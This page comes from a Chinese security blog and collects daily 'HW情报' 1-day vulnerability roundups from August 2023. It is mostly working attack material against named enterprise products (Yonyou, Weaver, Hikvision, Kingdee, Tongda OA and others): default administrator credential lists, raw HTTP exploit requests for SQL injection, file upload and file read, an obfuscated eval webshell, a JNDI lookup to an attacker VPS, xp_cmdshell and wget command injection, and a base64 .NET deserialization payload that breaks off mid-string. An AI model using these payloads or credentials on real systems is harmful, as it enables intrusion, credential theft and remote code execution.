分类漏洞下的文章 - 月下随笔

首页月影的wiki

1 2023HW漏洞POC、EXP补充 719 阅读 2 海康威视常见漏洞收集 568 阅读 3 Cobalt Strike 插件CSx3Ldr，一键生成免杀木马 422 阅读 4 代码审计分析工具 Fortify-2023 295 阅读 5 windows域控常见打法 271 阅读

渗透测试代码脚本工具备忘录业余爱好闲话系统应急梅花易数小六壬漏洞

登录

月影

累计撰写 85 篇文章
累计收到 101 条评论

首页
栏目
- 渗透测试
- 代码脚本
- 工具
- 备忘录
- 业余爱好
- 闲话
- 系统应急
- 梅花易数
- 小六壬
- 漏洞
页面
- 月影的wiki

搜索到 15 篇与的结果

2023-08-13
HW情报-2023年8月13日-1day汇总各厂商默认密码安恒产品最新策略：Dbapp@年份天融信防火墙用户名:superman 密码:talent天融信防火墙用户名:superman 密码:talent!23 联想网御防火墙用户名:admin 密码:leadsec@7766、administrator、bane@7766深信服防火墙用户名：admin 密码：admin启明星辰用户名：admin 密码：bane@7766 用户名：admin 密码：admin@123juniper 用户名:netscreen 密码:netscreenCisco 用户名:admin 密码:ciscoHuawei 用户名:admin 密码:Admin@123 H3C 用户名:admin 密码:admin绿盟IPS 用户名: weboper 密码: weboper网神防火墙GE1 用户名：admin 密码：firewall深信服VPN：51111端口密码:delanrecover华为VPN：账号：root 密码：mduadmin华为防火墙：admin 密码:Admin@123 EudemonJuniper防火墙：netscreen netscreen迪普 192.168.0.1 默认的用户名和密码（admin/admin_default)山石 192.168.1.1 默认的管理账号为hillstone，密码为hillstone安恒的明御防火墙 admin/adminadmin某堡垒机 shterm/shterm天融信的vpn test/123456致远OAsystem用户（默认密码：system，对应A8的系统管理员、A6的单位管理员）group-admin（默认密码：123456，对应A8集团版的集团管理员）admin1（默认密码：123456，对应A8企业版的单位管理员）audit-admin（默认密码：123456，对应审计管理员）泛微OA用户名:sysadmin 密码:1安全设备常见安全设备天融信防火墙用户名:superman 密码:talent天融信防火墙用户名:superman 密码:talent!23联想网御防火墙用户名:admin 密码:leadsec@7766、administrator、bane@7766深信服防火墙用户名：admin 密码：admin启明星辰用户名：admin 密码：bane@7766 用户名：admin 密码：admin@123juniper 用户名:netscreen 密码:netscreenCisco 用户名:admin 密码:ciscoHuawei 用户名:admin 密码:Admin@123H3C 用户名:admin 密码:admin绿XXXIPS 用户名: weboper 密码: weboper网神防火墙GE1 用户名：admin 密码：firewall深信服VPN：51111端口密码:delanrecover华为VPN：账号：root 密码：mduadmin华为超融合：admin 密码：Huawei12#$华为防火墙：admin 密码:Admin@123华为EudemonJuniper防火墙：netscreen netscreen迪普 192.168.0.1 默认的用户名和密码（admin/admin_default)山石 192.168.1.1 默认的管理账号为hillstone，密码为hillstone安恒的明御防火墙 admin/adminadmin某堡垒机 shterm/shterm天融信的vpn test/123456阿姆瑞特防火墙admin/manager明御WEB应用防火墙admin/admin明御安全网关admin/adminadmin天清汗马admin/veuns.fw audit/veuns.audit网康日志中心ns25000/ns25000网络安全审计系统（中科新业）admin/123456LogBase日志管理综合审计系统admin/safetybase中新金盾硬件防火墙admin/123kill防火墙(冠群金辰)admin/sys123黑盾防火墙admin/adminXXX蒙安全产品IPS入侵防御系统、SASH运维安全管理系统、SAS安全审计系统、DAS数据库审计系统、RSAS远程安全评估系统、WAF WEB应用防护系统、UTS威胁检测系统sysauditor/sysauditorsysmanager/sysmanagersupervisor/supervisormaintainer/maintainerwebpolicy/webpolicysysadmin/sysadminconadmin/conadminsupervis/superviswebaudit/webauditsysadmin/sysadminconadmin/nsfocusweboper/weboperauditor/auditorweboper/webopernsadmin/nsadminadmin/nsfocusadmin/adminshell/shell默认密码在线查询网站https://CIRT.nethttps://cirt.net/passwords默认密码列表https://datarecovery.com/rd/default-passwords/工具猫路由器默认密码查询https://toolmao.com/baiduapp/routerpwd/广联达 Linkworks GetIMDictionarySQL 注入漏洞POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --广联达oa sql注入漏洞 POCPOST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1 Host: xxx.com Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://xxx.com:8888/Services/Identification/Server/Incompatible.aspx Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 88 dasdas=&key=1' UNION ALL SELECT top 1812 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --广联达oa 后台文件上传漏洞 POCPOST /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1 Host: 10.10.10.1:8888 X-Requested-With: Ext.basex Accept: text/html, application/xhtml+xml, image/jxr, */* Accept-Language: zh-Hans-CN,zh-Hans;q=0.5 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj Accept: */* Origin: http://10.10.10.1 Referer: http://10.10.10.1:8888/Workflow/Workflow.aspx?configID=774d99d7-02bf-42ec-9e27-caeaa699f512&menuitemid=120743&frame=1&modulecode=GTP.Workflow.TaskCenterModule&tabID=40 Cookie: Connection: close Content-Length: 421 ------WebKitFormBoundaryFfJZ4PlAZBixjELj Content-Disposition: form-data; filename="1.aspx";filename="1.jpg" Content-Type: application/text <%@ Page Language="Jscript" Debug=true%> <% var FRWT='XeKBdPAOslypgVhLxcIUNFmStvYbnJGuwEarqkifjTHZQzCoRMWD'; var GFMA=Request.Form("qmq1"); var ONOQ=FRWT(19) + FRWT(20) + FRWT(8) + FRWT(6) + FRWT(21) + FRWT(1); eval(GFMA, ONOQ); %> ------WebKitFormBoundaryFfJZ4PlAZBixjELj-- 汉得SRM tomcat.jsp 登录绕过漏洞 POC/tomcat.jsp?dataName=role_id&dataValue=1 /tomcat.jsp?dataName=user_id&dataValue=1 然后访问后台：/main.screen红帆 oa 注入POST /ioffice/prg/interface/zyy_AttFile.asmx HTTP/1.1 Host: 10.250.250.5 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Content-Length: 383 Content-Type: text/xml; charset=utf-8 Soapaction: "http://tempuri.org/GetFileAtt" Accept-Encoding: gzip, deflate Connection: close <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><GetFileAtt xmlns="http://tempuri.org/"><fileName>123</fileName></GetFileAtt> </soap:Body></so ap:Envelope>红帆OA zyy_AttFile.asmx SQL注入漏洞POST /ioffice/prg/interface/zyy_AttFile.asmx HTTP/1.1 Host: 10.250.250.5 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Content-Length: 383 Content-Type: text/xml; charset=utf-8 Soapaction: "http://tempuri.org/GetFileAtt" Accept-Encoding: gzip, deflate Connection: close <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><GetFileAtt xmlns="http://tempuri.org/"><fileName>123</fileName></GetFileAtt> </soap:Body></so ap:Envelope> 修复方法官方已发布安全修复版本，请升级至官网最新版本https://www.ioffice.cn/宏景 HCM codesettree SQL 注入漏洞GET /servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20al l~20select~20~27~31~27~2cusername~20from~20operuser~20~2d~2d HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Accept-Encoding: gzip, deflate Connection: close宏景OA文件上传POST /w_selfservice/oauthservlet/%2e./.%2e/system/options/customreport/OfficeServer.jsp HTTP/1.1 Host: xx.xx.xx.xx Cookie: JSESSIONID=C92F3ED039AAF958516349D0ADEE426E User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Content-Length: 417 DBSTEP V3.0 351 0 666 DBSTEP=REJTVEVQ OPTION=U0FWRUZJTEU= currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66 FILETYPE=Li5cMW5kZXguanNw RECOR1DID=qLSGw4SXzLeGw4V3wUw3zUoXwid6 originalFileId=wV66 originalCreateDate=wUghPB3szB3Xwg66 FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6 needReadFile=yRWZdAS6 originalCreateDate=wLSGP4oEzLKAz4=iz=66 1 shell:http://xx.xx.xx.xx/1ndex.jsp华天动力oa SQL注入访问 http://xxxx//report/reportJsp/showReport.jsp?raq=%2FJourTemp2.raq&reportParamsId=100xxx 然后抓包 POST /report/reportServlet?action=8 HTTP/1.1 Host: xxxx Content-Length: 145 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://xxx/ Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://xxxx/report/reportJsp/showReport.jsp?raq=%2FJourTemp2.raq&reportParamsId=100xxx Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: JSESSIONID=D207AE96056400942620F09D34B8CDF3 Connection: close year=*&userName=*&startDate=*&endDate=*&dutyRule=*&resultPage=%2FreportJsp%2FshowRepo金蝶云星空 CommonFileserver 任意文件读取漏洞 GET /CommonFileServer/c:/windows/win.ini金和OA C6-GetSgIData.aspx SQL注入漏洞 POST /c6/Contro/GetSglData.aspx/.ashx Host: ip.port User-Agent: Mozillal5.0 (Windows NT 5.1) AppleWebkit/537.36(KHTML， like Gecko) Chrome/35.0.2117.157 Safari/537 36 Connection: close Content-Length.189 Content-Type. text/plain Accept-Encoding: gzip exec master..xp cmdshell 'ipconfig' 金和OA 未授权1. 漏洞链接 http://xx.xx.xx.xx/C6/Jhsoft.Web.users/GetTreeDate.aspx/?id=1 2. 复现步骤 http://xx.xx.xx.xx/C6/Jhsoft.Web.users/GetTreeDate.aspx/?id=1%3bWAITFOR+DELAY+'0%3a0%3a5'+--%20and%201=1金盘微信管理平台 getsysteminfo 未授权访问漏洞/admin/weichatcfg/getsysteminfo金盘图书馆微信管理后台 getsysteminfo 未授权访问漏洞POC: /admin/weichatcfg/getsysteminfo 漏洞描述：北京金盘鹏图软件技术有限公司的金盘图书馆微信管理后台 getsysteminfo 存在未授权访问漏洞漏洞危害:获取管理员账号密码等敏感数据，导致攻击者能以管理员身份进入系统窃取敏感信息和危险操作修复方法: 官方已发布安全修复版本，请升级至官网最新版本 http://goldlib.com.cn/
- 2023年08月13日
- 29 阅读
- 0 评论
- 0 点赞
2023-08-12
HW情报-2023年8月12日-1day汇总 0x01 用友移动管理系统 uploadApk.do 任意文件上传漏洞POST /maportal/appmanager/uploadApk.do?pk_obj= HTTP/1.1 Host: Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvLTG6zlX0gZ8LzO 3 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,im age/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Cookie: JSESSIONID=4ABE9DB29CA45044BE1BECDA0A25A091.server Connection: close ------WebKitFormBoundaryvLTG6zlX0gZ8LzO3 Content-Disposition:form-data;name="downloadpath"; filename="test.jsp" Content-Type: application/msword 1234 ------WebKitFormBoundaryvLTG6zlX0gZ8LzO3--0x02 用友 NC Cloud jsinvoke 任意文件上传漏洞POST /uapjs/jsinvoke/?action=invoke Content-Type: application/json { "serviceName":"nc.itf.iufo.IBaseSPService", "methodName":"saveXStreamConfig", "parameterTypes":[ "java.lang.Object", "java.lang.String" ], "parameters":[ "${param.getClass().forName(param.error).newInstance().eval(param.cmd)}", "webapps/nc_web/407.jsp" ] } POST /uapjs/jsinvoke/?action=invoke HTTP/1.1 Host: Connection: Keep-Alive Content-Length: 253 Content-Type: application/x-www-form-urlencoded {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${''.getClass().forName('javax.naming.InitialContext').newInstance().lookup('ldap://VPSip:1389/TomcatBypass/TomcatEcho')}","webapps/nc_web/301.jsp"]} 访问/cmdtest.jsp?error=bsh.Interpreter&cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec(%22whoami%22).getInputStream())0x03 网御ACM上网行为管理系统bottomframe.cgi SQL注入漏洞GET /bottomframe.cgi?user_name=%27))%20union%20select%20md5(1)%230x04 金盘微信管理平台getsysteminfo未授权访问漏洞url+/admin/weichatcfg/getsysteminfo0x05 Panel loadfile后台文件读取漏洞 POST /api/v1/file/loadfile {"path":"/etc/passwd"}
- 2023年08月12日
- 14 阅读
- 0 评论
- 0 点赞
2023-08-11
HW情报-2023年8月11日-1day汇总广联达oa sql注入漏洞 POC POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1 Host: xxx.com Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://xxx.com:8888/Services/Identification/Server/Incompatible.aspx Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 88 dasdas=&key=1' UNION ALL SELECT top 1812 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --广联达oa 后台文件上传漏洞 POCPOST /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1 Host: 10.10.10.1:8888 X-Requested-With: Ext.basex Accept: text/html, application/xhtml+xml, image/jxr, */* Accept-Language: zh-Hans-CN,zh-Hans;q=0.5 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj Accept: */* Origin: http://10.10.10.1 Referer: http://10.10.10.1:8888/Workflow/Workflow.aspx?configID=774d99d7-02bf-42ec-9e27-caeaa699f512&menuitemid=120743&frame=1&modulecode=GTP.Workflow.TaskCenterModule&tabID=40 Cookie: Connection: close Content-Length: 421 ------WebKitFormBoundaryFfJZ4PlAZBixjELj Content-Disposition: form-data; filename="1.aspx";filename="1.jpg" Content-Type: application/text <%@ Page Language="Jscript" Debug=true%> <% var FRWT='XeKBdPAOslypgVhLxcIUNFmStvYbnJGuwEarqkifjTHZQzCoRMWD'; var GFMA=Request.Form("qmq1"); var ONOQ=FRWT(19) + FRWT(20) + FRWT(8) + FRWT(6) + FRWT(21) + FRWT(1); eval(GFMA, ONOQ); %> ------WebKitFormBoundaryFfJZ4PlAZBixjELj-- 通达OA（CVE-2023-4166）描述-影响范围通达OA是由北京通达信科科技有限公司自主研发的协同办公自动化软件，是适合各个行业用户的综合管理办公平台本次范围：通达OA版本11.10之前GET /general/system/seal_manage/dianju/delete_log.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1 Host: 192.168.232.137:8098 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: PHPSESSID=1u7tsd1cpgp9qvco726smb50h5; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=779f3f46 Upgrade-Insecure-Requests: 1泛微 Weaver E-Office9 前台文件包含http://URL/E-mobile/App/Init.php?weiApi=1&sessionkey=ee651bec023d0db0c233fcb562ec7673_admin&m=12344554_../../attachment/xxx.xls 蓝凌oa前台代码执行POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1 Host:www.ynjd.cn:801 User-Agent:Mozilla/4.0 (compatible;MSIE 8.0;Windows NT 6.1) Accept: Connection:Keep-Alive Content-Length:42 Content-Type:application/x-www-form-urlencoded var={"body":{"file":"file:///etc/passwd"}} 泛微某版本sql注入POST /dwr/call/plaincall/CptDwrutil.ifNewsCheckoutByCurrentUser.dwr HTTP/1.1 Host:ip:port User-Agent:Mozilla/5.0 (Windows NT 5.1)AppleWebKit/537.36 (KHTML,like Gecko)Chrome/35.0.2117.157 Safari/537.36 Connection:close Content-Length:189 Content-Type:text/plain Accept-Encoding:gzip callCount=1 page= httpSessionId= scriptSessionId= c0-scriptName=DocDwrutil c0-methodName=ifNewscheckoutByCurrentUser c0-id=0 c0-param0=string:1 AND 1=1 c0-param1=string:1 batchId=0金和oa c7-getsqldata.aspx sql注入POST /C6/Control/GetSqlData.aspx/.ashx Host:ip:port User-Agent:Mozilla/5.0 (Windows NT 5.1)AppleWebKit/537.36 (KHTML,like Gecko)Chrome/35.0.2117.157 Safari/537.36 Connection:close Content-Length:189 Content-Type:text/plain Accept-Encoding:gzip exec master.xp_cmdshell 'ipconfig'绿盟sas交换机EXEC远程命令执行漏洞GET /webconf/Exec/index?cmd=wget%20xxx.xxx.xxx HTTP/1.1 H0st:1.1.1.1 User-Agent:Mozilla/5.0 (Macintosh;Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)Version/12.0.3 Safari/605.1.15 Content-Type:application/x-www-form-urlencoded Accept-Encoding:gzip,deflate Connection:close绿盟sas交换机GetFile任意文件读取漏洞POCGET /api/virtual/home/status? cat=../../../../../../../../../../../../../../usr/ocal/nsfocus/w eb/apache2/www/Local_user.php&method=login&user_account=admin HTTP/1.1 H0st:1.1.1.1 User-Agent:Mozilla/5.0 (Macintosh;Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)Version/12.0.3 Safari/605.1.15 Content-Type:application/x-www-form-urlencoded Accept-Encoding:gzip,deflate Connection:closelocal_user..php任意用户登录漏洞POCGET /api/virtual/home/status? cat=../.././../././.././../.././.././../usr/几ocal/nsfocus/w eb/apache2/www/local_user.php&method=login&user_account=admin HTTP/1.1 H0st:1.1.1.1 User-Agent:Mozilla/5.0 (Macintosh;Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)Version/12.0.3 Safari/605.1.15 Accept-Encoding:gzip,deflate Connection:close
- 2023年08月11日
- 14 阅读
- 0 评论
- 0 点赞
2023-08-10
HW情报-2023年8月10日-1day汇总 HiKVISION 综合安防管理平台 files 任意⽂件上传漏洞漏洞描述HiKVISION 综合安防管理平台 files 接⼝存在任意⽂件上传漏洞，攻击者通过漏洞可以上传任意⽂件漏洞影响HiKVISION 综合安防管理平台⽹络测绘app="HIKVISION-综合安防管理平台"web.title=="综合安防管理平台"漏洞复现登陆⻚⾯需要开放运⾏管理中⼼ (8001端⼝)pocPOST /center/api/files;.html HTTP/1.1 Host: Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM7 55PLa54a ------WebKitFormBoundary9PggsiM755PLa54a Content-Disposition: form-data; name="file"; filename ="../../../../../../../../../../../opt/hikvision/web/components/tomcat85li nux64.1/webapps/eportal/new.jsp" Content-Type: application/zip <%out.print("test3");%> ------WebKitFormBoundary9PggsiM755PLa54a--深信服应用交付报表系统RCEpocPOST /rep/login HTTP/1.1 Host: Cookie: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac 0s X 10.15: ry:109.0)Gecko/20100101 Firefox/115.0 Accept:text/html,application/xhtml+xml,application/xml;g=0,9, image/avif, image/webp,*/*;q=0.8 Accept-Language:zh-CN, zh;g=0.8, zh-TW;g=0.7, zh-HK;g=0.5,en-US;g=0.3,en;g=0.2 Accept-Encoding: gzip deflate Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: cross-site Pragma: no-cache Cache-Control: no-cache14 Te: trailers Connection: close Content-Type:application/x-www-form-urlencoded Content-Length: 126 clsMode=cls_mode_login&index=index&log_type=report&page=login&rnd=0.7550103466497915&userID=admin%0Aid -a %0A&userPsw=tmbhuisq ⾦蝶OA 云星空 kdsvc 远程命令执⾏漏洞漏洞描述该漏洞是由⾦蝶云星空管理中⼼的通信层默认采⽤的是⼆进制数据格式，需要进⾏序列化与反序列化，此通信过程中未做签名或验证，导致被恶意利⽤漏洞影响⾦蝶OA云星空⽹络测绘app="⾦蝶云星空-管理中⼼"漏洞复现登陆⻚⾯验证POCPOST /Kingdee.BOS.ServiceFacade.ServicesStub.DevReportService.GetBusinessOb jectData.common.kdsvc HTTP/1.1 Host: cmd: whoami Content-Type: text/json {"ap0":"AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2l vbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNG UwODkFAQAAACFTeXN0ZW0uV2luZG93cy5Gb3Jtcy5BeEhvc3QrU3RhdGUBAAAAEVByb3BlcnR5Q mFnQmluYXJ5BwICAAAACQMAAAAPAwAAAMctAAACAAEAAAD/////AQAAAAAAAAAEAQAAAH9TeXN0 ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5MaXN0YDFbW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCB WZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNT YxOTM0ZTA4OV1dAwAAAAZfaXRlbXMFX3NpemUIX3ZlcnNpb24FAAAICAkCAAAACgAAAAoAAAAQA gAAABAAAAAJAwAAAAkEAAAACQUAAAAJBgAAAAkHAAAACQgAAAAJCQAAAAkKAAAACQsAAAAJDAAA AA0GBwMAAAABAQAAAAEAAAAHAgkNAAAADA4AAABhU3lzdGVtLldvcmtmbG93LkNvbXBvbmVudE1 vZGVsLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Mz FiZjM4NTZhZDM2NGUzNQUEAAAAalN5c3RlbS5Xb3JrZmxvdy5Db21wb25lbnRNb2RlbC5TZXJpY WxpemF0aW9uLkFjdGl2aXR5U3Vycm9nYXRlU2VsZWN0b3IrT2JqZWN0U3Vycm9nYXRlK09iamVj dFNlcmlhbGl6ZWRSZWYCAAAABHR5cGULbWVtYmVyRGF0YXMDBR9TeXN0ZW0uVW5pdHlTZXJpYWx pemF0aW9uSG9sZGVyDgAAAAkPAAAACRAAAAABBQAAAAQAAAAJEQAAAAkSAAAAAQYAAAAEAAAACR MAAAAJFAAAAAEHAAAABAAAAAkVAAAACRYAAAABCAAAAAQAAAAJFwAAAAkYAAAAAQkAAAAEAAAAC RkAAAAJGgAAAAEKAAAABAAAAAkbAAAACRwAAAABCwAAAAQAAAAJHQAAAAkeAAAABAwAAAAcU3lz dGVtLkNvbGxlY3Rpb25zLkhhc2h0YWJsZQcAAAAKTG9hZEZhY3RvcgdWZXJzaW9uCENvbXBhcmV yEEhhc2hDb2RlUHJvdmlkZXIISGFzaFNpemUES2V5cwZWYWx1ZXMAAAMDAAUFCwgcU3lzdGVtLk NvbGxlY3Rpb25zLklDb21wYXJlciRTeXN0ZW0uQ29sbGVjdGlvbnMuSUhhc2hDb2RlUHJvdmlkZ XII7FE4PwIAAAAKCgMAAAAJHwAAAAkgAAAADw0AAAAAEAAAAk1akAADAAAABAAAAP//AAC4AAAA AAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAOH7oOALQJzSG4AUz NIVRoaXMgcHJvZ3JhbSBjYW5ub3QgYmUgcnVuIGluIERPUyBtb2RlLg0NCiQAAAAAAAAAUEUAAE wBAwAnQZBkAAAAAAAAAADgAAIhCwELAAAIAAAABgAAAAAAAP4mAAAAIAAAAEAAAAAAABAAIAAAA AIAAAQAAAAAAAAABAAAAAAAAAAAgAAAAAIAAAAAAAADAECFAAAQAAAQAAAAABAAABAAAAAAAAAQ AAAAAAAAAAAAAACkJgAAVwAAAABAAACoAgAAAAAAAAAAAAAAAAAAAAAAAABgAAAMAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAgAAAAAAAAAAA AAAAggAABIAAAAAAAAAAAAAAAudGV4dAAAAAQHAAAAIAAAAAgAAAACAAAAAAAAAAAAAAAAAAAgA ABgLnJzcmMAAACoAgAAAEAAAAAEAAAACgAAAAAAAAAAAAAAAAAAQAAAQC5yZWxvYwAADAAAAABg AAAAAgAAAA4AAAAAAAAAAAAAAAAAAEAAAEIAAAAAAAAAAAAAAAAAAAAA4CYAAAAAAABIAAAAAgA FADAhAAB0BQAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAbMAMAwwAAAAEAABECKAMAAAooBAAACgoGbwUAAApvBgAACgZvBwAACm8IAAAKc wkAAAoLB28KAAAKcgEAAHBvCwAACgZvDAAACm8NAAAKchEAAHBvDgAACgwHbwoAAApyGQAAcAgo DwAACm8QAAAKB28KAAAKF28RAAAKB28KAAAKF28SAAAKB28KAAAKFm8TAAAKB28UAAAKJgdvFQA ACm8WAAAKDQZvBwAACglvFwAACt4DJt4ABm8HAAAKbxgAAAoGbwcAAApvGQAACioAARAAAAAAIg CHqQADDgAAAUJTSkIBAAEAAAAAAAwAAAB2NC4wLjMwMzE5AAAAAAUAbAAAANABAAAjfgAAPAIAA HQCAAAjU3RyaW5ncwAAAACwBAAAJAAAACNVUwDUBAAAEAAAACNHVUlEAAAA5AQAAJAAAAAjQmxv YgAAAAAAAAACAAABRxQCAAkAAAAA+iUzABYAAAEAAAAOAAAAAgAAAAEAAAAZAAAAAgAAAAEAAAA BAAAABAAAAAAACgABAAAAAAAGACkAIgAGAFYANgAGAHYANgAKAKgAnQAKAMAAnQAKAOgAnQAOAB sBCAEOACMBCAEKAE8BnQAOAIYBZwEGAK8BIgASACQCGgIGAEQCGgIGAGkCIgAAAAAAAQAAAAAAA QABAAAAEAAXAAAABQABAAEAUCAAAAAAhhgwAAoAAQARADAADgAZADAACgAJADAACgAhALQAHAAh ANIAIQApAN0ACgAhAPUAJgAxAAIBCgA5ADAACgA5ADQBKwBBAEIBMAAhAFsBNQBJAJoBOgBRAKY BPwBZALYBRABBAL0BMABBAMsBSgBBAOYBSgBBAAACSgA5ABQCTwA5ADECUwBpAE8CWAAxAFkCMA AxAF8CCgAxAGUCCgAuAAsAZQAuABMAbgBcAASAAAAAAAAAAAAAAAAAAAAAAJQAAAAEAAAAAAAAA AAAAAABABkAAAAAAAIAAAAAAAAAAAAAABMAnQAAAAAAAgAAAAAAAAAAAAAAAQAiAAAAAAACAAAA AAAAAAAAAAABABkAAAAAAAAAADxNb2R1bGU+AHQyZnZ6NGlsLmRsbABFAG1zY29ybGliAFN5c3R lbQBPYmplY3QALmN0b3IAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBDb21waWxhdG lvblJlbGF4YXRpb25zQXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAHQyZ nZ6NGlsAFN5c3RlbS5XZWIASHR0cENvbnRleHQAZ2V0X0N1cnJlbnQASHR0cFNlcnZlclV0aWxp dHkAZ2V0X1NlcnZlcgBDbGVhckVycm9yAEh0dHBSZXNwb25zZQBnZXRfUmVzcG9uc2UAQ2xlYXI AU3lzdGVtLkRpYWdub3N0aWNzAFByb2Nlc3MAUHJvY2Vzc1N0YXJ0SW5mbwBnZXRfU3RhcnRJbm 